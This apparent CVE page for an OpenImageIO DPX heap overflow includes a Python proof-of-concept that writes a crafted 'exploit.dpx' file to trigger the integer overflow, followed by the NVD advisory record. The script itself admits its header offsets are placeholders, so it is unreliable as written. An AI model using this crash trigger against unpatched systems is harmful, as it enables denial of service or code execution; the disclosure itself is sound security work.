CVE-2026-43907

# PoC Concept for CVE-2026-43907 # This script generates a malformed DPX file with large dimensions to trigger the integer overflow. import struct def create_malformed_dpx(filename): # DPX file header magic magic = b'SDPX' offset_to_image = 2048 # Construct a basic DPX header (simplified) # Setting width and height to a very large value to trigger the overflow # in pixels * -3 calculation within 32-bit signed integer range. width = 0x70000000 # Large width to force integer overflow height = 1 header = bytearray(offset_to_image) header[0:4] = magic # Image offset (little-endian) header[4:8] = struct.pack('<I', offset_to_image) # Width and Height are at specific offsets in DPX header # Offset 768: Image Orientation (unsigned int) # Offset 770: Number of elements (unsigned int) # Offset 780: Width per element (unsigned int) - Simplified placement for PoC # Note: Actual DPX structure is more complex, this targets the logic vulnerability. # Writing width and height into generic positions for conceptual PoC # In a real exploit, precise header offsets must be matched. header[16:20] = struct.pack('<I', width) header[20:24] = struct.pack('<I', height) with open(filename, 'wb') as f: f.write(header) # Write minimal dummy data to simulate file content f.write(b'A' * 100) print(f'Malformed DPX file created: {filename}') if __name__ == '__main__': create_malformed_dpx('exploit.dpx')

{"cve": {"id": "CVE-2026-43907", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:06.760", "lastModified": "2026-05-14T21:21:10.620", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to 3.0.18.0 and 3.1.13.0, a signed integer overflow in QueryRGBBufferSizeInternal() in DPXColorConverter.cpp leads to a heap-based out-of-bounds write when processing crafted DPX image files. The function computes buffer sizes using 32-bit signed integer arithmetic with negative multipliers (e.g., pixels * -3 * bytes for kCbYCr descriptors and pixels * -4 * bytes for kABGR descriptors), where a negative result is used as an in-band signal that no separate buffer is needed. When the pixel count is sufficiently large, the multiplication overflows INT_MIN and wraps to a small positive value. The caller in dpxinput.cpp interprets this positive value as a required buffer size, allocates an undersized heap buffer via m_decodebuf.resize(), and then writes the full image data into it via fread, resulting in a heap buffer overflow. An attacker can exploit this by crafting a DPX file that triggers the overflow, causing a denial of service (crash) or potentially arbitrary code execution through heap corruption in any application that reads pixel data using OpenImageIO. This vulnerability is fixed in 3.0.18.0 and 3.1.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/security/advisories/GHSA-cq46-hp4h-cvfr", "source": "[email protected]"}, {"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/security/advisories/GHSA-cq46-hp4h-cvfr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}